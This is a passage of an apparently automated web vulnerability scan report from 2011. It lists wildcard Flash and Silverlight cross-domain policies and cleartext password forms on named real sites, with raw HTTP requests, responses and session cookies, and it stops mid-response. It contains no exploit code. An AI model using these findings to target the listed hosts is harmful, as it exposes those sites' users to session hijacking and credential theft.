GET /crossdomain.xml HTTP/1.0
Host: nuovo.camera.it

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml
Last-Modified: Tue, 25 Jan 2011 15:13:43 GMT
Vary: Accept-Encoding
Content-Length: 1023
Date: Mon, 02 May 2011 22:26:32 GMT
X-Varnish: 132687829
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: dmzxmweb05
X-Cache: MISS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="http://www.camera.it" />
<allow-access-from domain="www.camera.it" />
<allow-access-from domain="http://leg16.camera.it" />
<allow-access-from domain="*.camera.it" />
<allow-access-from domain="http://nuovo.camera.it" />
...[SNIP]...
<allow-access-from domain="*.nuovo.camera.it" />
<allow-access-from domain="http://xm.intra.camera.it" />
<allow-access-from domain="*.xm.intra.camera.it" />
<allow-access-from domain="xm.intra.camera.it" />
<allow-access-from domain="http://xmtenderinter.intra.camera.it" />
<allow-access-from domain="*.xmtenderinter.intra.camera.it" />
<allow-access-from domain="xmtenderinter.intra.camera.it" />
<allow-access-from domain="http://nuovo.intra.camera.it" />
<allow-access-from domain="*.nuovo.intra.camera.it" />
<allow-access-from domain="nuovo.intra.camera.it" />
...[SNIP]...

5.38. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Mon, 02 May 2011 22:33:53 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

5.39. https://www.eni.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.eni.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eni.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:55:43 GMT
Last-Modified: Fri, 12 Nov 2010 08:47:16 GMT
ETag: "2caf6-148-232eed00"
Accept-Ranges: bytes
Content-Length: 328
Connection: close
Content-Type: application/xml
Set-Cookie: TS782077=2dff656feed00e0ad3df2bc60f4c0f7722f0b4bab3ec8bf54dbf447e; Path=/

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.eni.it" />
   <allow-access-from domain="*.eni.com" secure="true" />
...[SNIP]...
<allow-access-from domain="eni.com" secure="true" />
...[SNIP]...

5.40. http://imagesdotcom.ilsole24ore.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imagesdotcom.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: imagesdotcom.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:18:05 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Last-Modified: Wed, 07 May 2008 05:43:55 GMT
Accept-Ranges: bytes
Content-Length: 133
Vary: Accept-Encoding,User-Agent
ETag: "10dc6c-85-44c9d734f5cc0"-gzip
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="ilsole24ore.com" to-ports="80" />
</cross-domain-policy>

5.41. http://job24.ilsole24ore.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://job24.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: job24.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:34 GMT
Server: Apache/2.0.46 (CentOS)
Last-Modified: Tue, 19 Feb 2008 14:13:10 GMT
ETag: "81ee02-82-78e86980"
Accept-Ranges: bytes
Content-Length: 130
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="ilsole24ore.com" to-ports="80" />
</cross-domain-policy>

6. Silverlight cross-domain policy  previous  next
There are 10 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 15:50:56 GMT
Date: Mon, 02 May 2011 22:45:44 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.2. http://ad78.neodatagroup.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad78.neodatagroup.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad78.neodatagroup.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
Last-Modified: Mon, 12 Oct 2009 10:53:26 GMT
ETag: "5d8985-145-475babd3b7580"
Accept-Ranges: bytes
Content-Length: 325
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 22:17:39 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

6.3. http://adlev.neodatagroup.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adlev.neodatagroup.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: adlev.neodatagroup.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:21:48 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
Last-Modified: Mon, 12 Oct 2009 10:53:26 GMT
ETag: "5d8985-145-475babd3b7580"
Accept-Ranges: bytes
Content-Length: 325
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 22:21:48 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

6.4. http://cdn1.eyewonder.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn1.eyewonder.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cdn1.eyewonder.com

Response

HTTP/1.0 200 OK
Content-Length: 261
Content-Type: text/xml
Last-Modified: Wed, 08 Oct 2008 19:49:12 GMT
Accept-Ranges: bytes
ETag: "12b0cf07e29c91:13a0"
Server: Microsoft-IIS/6.0
p3p: policyref="/200125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Cache-Control: max-age=3559
Date: Mon, 02 May 2011 22:17:05 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?><access-policy><cross-domain-access><policy><allow-from http-request-headers="*"><domain uri="*"/></allow-from><grant-to><resource path="/" include-subpaths="true
...[SNIP]...

6.5. http://elstatic.weborama.fr/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://elstatic.weborama.fr
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: elstatic.weborama.fr

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/xml
Date: Mon, 02 May 2011 23:05:02 GMT
ETag: "820671401"
Expires: Mon, 09 May 2011 23:05:02 GMT
Last-Modified: Wed, 12 May 2010 19:52:17 GMT
Server: ECAcc (dca/5370)
X-Cache: HIT
Content-Length: 298
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
</allow-from>
<grant-to>
<resourc
...[SNIP]...

6.6. http://ieo.solution.weborama.fr/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ieo.solution.weborama.fr
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ieo.solution.weborama.fr

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:04:57 GMT
Server: Apache
Last-Modified: Wed, 12 May 2010 19:39:08 GMT
ETag: "68008-12a-4866acba3af00"
Accept-Ranges: bytes
Content-Length: 298
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
</allow-from>
<grant-to>
<resourc
...[SNIP]...

6.7. http://metrics.ilsole24ore.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ilsole24ore.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:44 GMT
Server: Omniture DC/2.0.0
xserver: www12
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.8. http://omniture.virgilio.it/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omniture.virgilio.it
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: omniture.virgilio.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:16:17 GMT
Server: Omniture DC/2.0.0
xserver: www22
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.9. http://secure-it.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-it.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-it.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:43 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 09 May 2011 22:17:43 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

6.10. http://api.bing.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bing.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 348
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT
ETag: 3B4046BBE5F127E45C1A35A93B86C3890000015C
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Mon, 02 May 2011 22:23:14 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-05-02T22%3a23%3a14; expires=Thu, 12-May-2011 22:23:14 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=20E8C6C83AEB492C83715B7C9D6D2BC0; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1753823&MS=1753823; expires=Wed, 01-May-2013 22:23:14 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=BCC05BE254104E4CA7552CD9C2BBFAF8; expires=Wed, 01-May-2013 22:23:14 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110502; expires=Wed, 01-May-2013 22:23:14 GMT; domain=.bing.com; path=/

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*.bing.com"/>
</allow-from>

...[SNIP]...

7. Cleartext submission of password  previous  next
There are 14 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


7.1. http://cp.mightyblue.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cp.mightyblue.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: cp.mightyblue.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HELM=Password=&Username=; ASPSESSIONIDCCABDABT=KDAKGJPDPIDLCPJOHPKKOIKD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:25:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
cache-control: no-cache
Content-Length: 5889
Content-Type: text/html
Expires: Sun, 01 May 2011 21:25:18 GMT
Set-Cookie: HELM=Interface=&NonSecureReturnURL=&Username=&Password=; expires=Tue, 01-May-2012 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCBBBCAS=KGAIJAJDPDPMGCEMADNKOION; path=/
ACCEPT-RANGES: none

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<lin
...[SNIP]...
<table border="0" cellpadding="0" cellspacing="0" align="center" width="100%">
<form name="frmLogon" action="default.asp" method="POST">
<tr>
...[SNIP]...
<td><input type="password" name="txtPassword" size="20" value="" class="textBox"></td>
...[SNIP]...

7.2. http://cp.mightyblue.com/default.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cp.mightyblue.com
Path:   /default.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

POST /default.asp HTTP/1.1
Host: cp.mightyblue.com
Proxy-Connection: keep-alive
Referer: http://cp.mightyblue.com/
Cache-Control: max-age=0
Origin: http://cp.mightyblue.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABDABT=KDAKGJPDPIDLCPJOHPKKOIKD; HELM=Interface=&NonSecureReturnURL=&Username=&Password=; ASPSESSIONIDCCBBBCAS=IGAIJAJDHCHPFKIAEPNMOKIO
Content-Length: 86

txtUsername=&txtPassword=&selLanguageCode=EN&selInterface=standard_XP&btnProcess=Logon

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:25:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
cache-control: no-cache
Content-Length: 5898
Content-Type: text/html
Expires: Sun, 01 May 2011 21:25:26 GMT
Set-Cookie: HELM=Interface=&NonSecureReturnURL=&LanguageCode=EN&Password=&Username=; expires=Tue, 01-May-2012 07:00:00 GMT; path=/
ACCEPT-RANGES: none

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<lin
...[SNIP]...
<table border="0" cellpadding="0" cellspacing="0" align="center" width="100%">
<form name="frmLogon" action="default.asp" method="POST">
<tr>
...[SNIP]...
<td><input type="password" name="txtPassword" size="20" value="" class="textBox"></td>
...[SNIP]...

7.3. http://digg.com/submit  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Tue, 03-May-2011 22:24:04 GMT; path=/; domain=digg.com
Set-Cookie: d=a6c9fed1b0af625d597fc8f28c424ca9628041e70e1e569b66b06472a71d7e23; expires=Sun, 02-May-2021 08:31:44 GMT; path=/; domain=.digg.com
X-Digg-Time: D=59942 10.2.129.78
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8170

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

7.4. http://du.ilsole24ore.com/utenti/Registrazione.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://du.ilsole24ore.com
Path:   /utenti/Registrazione.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /utenti/Registrazione.aspx HTTP/1.1
Host: du.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 22:24:07 GMT
Server: Microsoft-IIS/6.0
SERVER: PRODFE1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="Registrazione.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div class="form_text_box" id="password_input">
<input class="text_box" type="password" maxlength="20" id="password" name="password">
</div>
...[SNIP]...
<div class="form_text_box" id="passwordConfirm_text">
<input class="text_box" type="password" id="passwordConfirm" name="passwordConfirm" maxlength="20">
</div>
...[SNIP]...

7.5. http://du.ilsole24ore.com/utenti/facebook_connect.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://du.ilsole24ore.com
Path:   /utenti/facebook_connect.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /utenti/facebook_connect.aspx HTTP/1.1
Host: du.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 22:24:07 GMT
Server: Microsoft-IIS/6.0
SERVER: PRODFE1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14607


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="facebook_connect.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td align="left" valign="middle"><input type="password" name="txtPassword" id="txtPassword" class="text_box_sole" value="" style="color:#000"/></td>
...[SNIP]...

7.6. http://jsdotcom.ilsole24ore.com/js2010/common.min.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jsdotcom.ilsole24ore.com
Path:   /js2010/common.min.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /js2010/common.min.js?v1.0003 HTTP/1.1
Host: jsdotcom.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.banchedati.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cc=true; s_cm_NW=undefinedburpburp; s_nr=1304393096016-New; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:30:17 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Last-Modified: Wed, 26 Jan 2011 10:59:55 GMT
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Wed, 01 Jun 2011 22:30:17 GMT
Vary: Accept-Encoding,User-Agent
ETag: "2a3e0a-32d5-49abdbbbb59bd"-gzip
Content-Type: application/x-javascript
Content-Length: 13013


var DEF_RURL=document.location;var DEF_ERRURL='http://www.ilsole24ore.com/errore.shtml';var DEF_SITECODE='CO';var DEF_SUBSCRIBE_SCRIPT='http://du.ilsole24ore.com/DU/iniziaRegistrazione.aspx';var DEF_
...[SNIP]...
<div id="login-window">';content+='<form id="login-form" action="" method="post" name="authUser">';content+='<input value="" name="URL" type="hidden"/>
...[SNIP]...
<br /><input class="ie6_input" type="password" name="txtPassword" /></p>
...[SNIP]...

7.7. http://jsdotcom.ilsole24ore.com/js2010/soleLib.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jsdotcom.ilsole24ore.com
Path:   /js2010/soleLib.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /js2010/soleLib.js?v1.0032 HTTP/1.1
Host: jsdotcom.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.10 (Linux/SUSE)
Last-Modified: Thu, 07 Apr 2011 13:00:09 GMT
Cache-Control: max-age=2592000
Expires: Sat, 28 May 2011 19:07:12 GMT
Vary: Accept-Encoding,User-Agent
